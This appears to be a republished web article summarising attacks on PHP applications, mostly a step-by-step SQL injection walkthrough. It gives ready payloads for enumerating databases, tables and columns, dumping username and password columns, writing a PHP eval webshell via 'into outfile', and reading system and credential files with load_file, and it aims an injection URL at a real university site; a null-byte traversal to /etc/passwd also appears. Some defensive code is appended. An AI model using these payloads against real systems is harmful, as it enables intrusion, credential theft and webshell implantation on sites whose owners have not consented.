A Summary of Several Common Attacks on PHP

  • 2021-12-11 07:00:07
  • OfStack

This article summarizes several common attacks on PHP applications, with examples, and is shared for your reference:

1. SQL Injection

① Determine the number of columns: order by num/*

② Confirm the column count: and 1=1 union select 1, 2, 3, 4, 5 ... n/*

③ Find which columns are echoed on the page: and 1=2 union select 1, 2, 3, 4, 5 ... n/*

④ Use built-in functions to reveal database information:

version() database() user()

Reveal database information without guessing which column is echoed (does not work on every site):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

Operating system information:

and 1=2 union all select @@global.version_compile_os from mysql.user /*

Database permissions:

and ord(mid(user(),1,1))=114/* (114 is the ASCII code of "r"; the page returns normally if the user is root)

Enumerate databases (MySQL > 5.0)

MySQL 5 and above ship a built-in database, information_schema, that stores the structure information of every database and table:

and 1=2 union select 1, 2, 3, SCHEMA_NAME, 5, 6, 7, 8, 9, 10 from information_schema.SCHEMATA limit 0, 1

Enumerate tables

and 1=2 union select 1, 2, 3, TABLE_NAME, 5, 6, 7, 8, 9, 10 from information_schema.TABLES where TABLE_SCHEMA=<database name, in hex> limit 0, 1 (limit start, count: 0 is the first record, 1 shows one record)

Enumerate columns

and 1=2 union select 1, 2, 3, COLUMN_NAME, 5, 6, 7, 8, 9, 10 from information_schema.COLUMNS where TABLE_NAME=<table name, in hex> limit 0, 1

Reveal the password

and 1=2 union select 1, 2, 3, <username column>, 5, 6, 7, <password column>, 8, 9 from <table name> limit 0, 1

Advanced usage (show two values through one echoed column): union select 1, 2, 3, concat(<username column>, 0x3c, <password column>), 5, 6, 7, 8, 9 from <table name> limit 0, 1

Write a webshell directly (requires root)

Conditions:

① The physical path of the site is known

② Sufficient privileges (test with select ... from mysql.user)

③ magic_quotes_gpc = Off

select '<?php eval($_POST[cmd])?>' into outfile '<physical path>'

and 1=2 union all select <hex value of the one-line shell> into outfile '<path>'

Common load_file() paths:

1. replace(load_file(0x2F6574632F706173737764), 0x3c, 0x20)
2. replace(load_file(char(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)), char(60), char(32))
   These two forms show the full source of a PHP file. If you do not replace the "<" character with a space, the browser renders the result as a web page and the code cannot be viewed.
3. load_file(char(47)) lists the root directory on FreeBSD and SunOS
4. /etc/httpd/conf/httpd.conf or /usr/local/apache/conf/httpd.conf: Apache virtual host configuration file on Linux
5. c:\Program Files\Apache Group\Apache\conf\httpd.conf or C:\apache\conf\httpd.conf: Apache configuration file on Windows
6. c:/Resin-3.0.14/conf/resin.conf: Resin configuration for a site developed in JSP
7. c:/Resin/conf/resin.conf or /usr/local/resin/conf/resin.conf: JSP virtual host configuration on Linux
8. d:\APACHE\Apache2\conf\httpd.conf
9. C:\Program Files\mysql\my.ini
10. ../themes/darkblue_orange/layout.inc.php: reveals the phpMyAdmin path
11. c:\windows\system32\inetsrv\MetaBase.xml: IIS virtual host configuration file
12. /usr/local/resin-3.0.22/conf/resin.conf: Resin 3.0.22 configuration file
13. /usr/local/resin-pro-3.0.22/conf/resin.conf: same as above
14. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: Apache virtual host configuration
15. /etc/sysconfig/iptables: firewall policy
16. /usr/local/app/php5/lib/php.ini: PHP settings
17. /etc/my.cnf: MySQL configuration file
18. /etc/redhat-release: Red Hat system version
19. C:\mysql\data\mysql\user.MYD: user passwords of the MySQL system
20. /etc/sysconfig/network-scripts/ifcfg-eth0: IP address
21. /usr/local/app/php5/lib/php.ini: PHP related settings
22. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: virtual web site settings
23. C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24. c:\windows\my.ini
25. c:\boot.ini

Problems with manual injection:

When the page after injection displays:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

For example: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20

this is caused by the two sides of the UNION using different character sets.

Solution: wrap the parameter as unhex(hex(parameter)). The URL above becomes:

http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20

and the injection can continue.
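The enumeration above only works because the request parameter is pasted into the SQL text. As an added example (not code from the original article; table, column names and the DSN are assumptions), here is that vulnerable query shape beside a parameterised version, with the server-side settings that blunt the load_file()/into outfile techniques:

```php
<?php
// Added example, not part of the original article. The "instruments" table,
// its columns and the connection details are assumptions.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8mb4', 'app_user', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepared statements
]);

// VULNERABLE: $_GET['ID'] becomes part of the statement text, so a value such as
// "13 and 1=2 union select ..." changes the query structure and the union-based
// enumeration of information_schema described above succeeds.
function instrument_vulnerable(PDO $pdo, string $id): array
{
    $sql = "SELECT id, name, model FROM instruments WHERE id = " . $id;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: the value is validated as a plain integer and then bound as a
// parameter, so no part of it can add an ORDER BY, a UNION or a comment.
function instrument_safe(PDO $pdo, string $id): array
{
    if (!ctype_digit($id)) {
        return []; // fail closed on anything that is not a positive integer
    }
    $stmt = $pdo->prepare('SELECT id, name, model FROM instruments WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Defence in depth against the load_file() / into outfile techniques: load_file()
// and INTO OUTFILE both require the MySQL FILE privilege, so run the web
// application as an account without it, e.g.
//   GRANT SELECT, INSERT, UPDATE, DELETE ON app.* TO 'app_user'@'localhost';
// and point secure_file_priv in my.cnf at a dedicated directory. Note that
// magic_quotes_gpc was removed in PHP 5.4, so its state is not a defence.

$rows = instrument_safe($pdo, $_GET['ID'] ?? '');
header('Content-Type: application/json');
echo json_encode($rows);
```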

2. XSS (Cross Site Scripting)

See: //www.ofstack.com/article/160334.htm

3. Source Code Revelation

Can be controlled with php.ini or .htaccess:


<Files ~ "\.inc$">
   Order allow,deny
   Deny from all
</Files>

4. Remote File Inclusion


<?php
$file = $_GET['file']; // attacker supplies "../../etc/passwd\0"
if (file_exists('/home/wwwrun' . $file . '.php')) {
    // the null byte terminates the path, so the trailing ".php" is dropped
    include '/home/wwwrun' . $file . '.php';
}
?>
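A hardened version of the include above, as an added example (not code from the original article); the base directory /home/wwwrun and the allow-listed name pattern are assumptions. Keep allow_url_include=Off in php.ini as well, so that a controlled path can never point at a remote URL:

```php
<?php
// Added example, not part of the original article. The base directory and the
// permitted page-name pattern are assumptions.
function safe_include_path(string $file): ?string
{
    $base = '/home/wwwrun';

    // 1. Reject null bytes outright. PHP >= 5.3.4 filesystem functions already
    //    refuse such paths, but an explicit check fails closed on every version.
    if (strpos($file, "\0") !== false) {
        return null;
    }

    // 2. Accept only a simple page name (letters, digits, underscore, hyphen).
    //    This rules out "../", "http://" and absolute paths before any I/O happens.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $file)) {
        return null;
    }

    $path = $base . '/' . $file . '.php';

    // 3. Canonicalise and confirm the result still lies inside the base directory,
    //    so a symlink or an unforeseen pattern cannot escape it.
    $real = realpath($path);
    if ($real === false || strpos($real, $base . '/') !== 0) {
        return null;
    }
    return $real;
}

$path = safe_include_path($_GET['file'] ?? '');
if ($path === null) {
    http_response_code(404);
    exit;
}
include $path;
```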

5. Session Hijacking

6. Cross Site Request Forgery (CSRF)

7. Directory Traversal


I hope this article is helpful to everyone's PHP programming.
